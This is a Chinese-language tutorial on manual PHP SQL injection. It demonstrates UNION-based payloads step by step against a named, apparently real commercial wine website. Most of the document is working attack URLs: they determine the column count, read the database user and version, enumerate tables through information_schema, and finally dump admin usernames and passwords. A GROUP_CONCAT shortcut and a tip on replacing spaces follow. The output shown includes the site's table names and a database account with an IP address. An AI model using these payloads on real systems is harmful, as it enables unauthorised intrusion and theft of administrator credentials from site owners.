php注入教程,PHP手工注入教程

一.

检测字段长度

http://www.osy-wine.com/news_show.php?id=-61 order by 24 报错  说明字段长度是24

查看数据库信息

http://www.osy-wine.com/news_show.php?id=-61+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24http://www.osy-wine.com/news_show.php?id=-61+union+select+1,user(),3,4,database(),version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24

user() ----------osywine@115.160.154.39

version()--------5.0.91-log   版本

5.0以上的版本都带有一个information_schema的虚拟库里面存放的是所有库的信息.

database()-------osywine

二.

利用虚拟库information_schema 报表

http://www.osy-wine.com/news_show.php?id=-61+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.tables+where+table_schema=0x6F737977696E65+limit+1,1

0x6F737977696E65 是osywine 16进制     0x6F737977696E6520

在添加limit+0,1 limit+1,1 limit+0,1 查询下一个

爆出admin这张表

三.

利用表爆字段

http://www.osy-wine.com/news_show.php?id=-61+union+select+1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.columns+where+table_name=0x61646D696E

爆出id

http://www.osy-wine.com/news_show.php?id=-61+union+select+1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.columns+where+table_name=0x61646D696E+limit+1,1爆出username

http://www.osy-wine.com/news_show.php?id=-61+union+select+1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.columns+where+table_name=0x61646D696E+limit+2,1爆出password

http://www.osy-wine.com/news_show.php?id=-61+union+select+1,username,3,4,password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+admin直接爆用户密码

**********************************************************************************

第二种方法(比较方便，速度)

一次性报爆表

http://www.osy-wine.com/news_show.php?id=-61+union+select+1,2,3,4,GROUP_CONCAT(DISTINCT+table_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.columns+where+table_schema=0x6F737977696E650x6F737977696E65   是16进制的osywine

所有的表如下：

aboutweb,admin,blog,ggao,liuyan,member,news,news_class,news_class2,photo,photo_class,products,products_class,products_class2,settle_accounts,shoping,youqinglj

一次性爆出所有字段

http://www.osy-wine.com/news_show.php?id=-61+union+select+1,2,3,4,GROUP_CONCAT(DISTINCT+column_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.columns+where+table_name=0x61646D696E0x61646D696E 是admin的16进制

所有字段如下；

id,username,password

接下来就是最后一步。。。用户名和密码直接暴出。。。。

http://www.osy-wine.com/news_show.php?id=-61+union+select+1,2,3,4,GROUP_CONCAT(DISTINCT+username,0x5f,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+admin

注:这里面所有的+号是代替空格的，还可以用/**/来代替,不同情况，不同分析！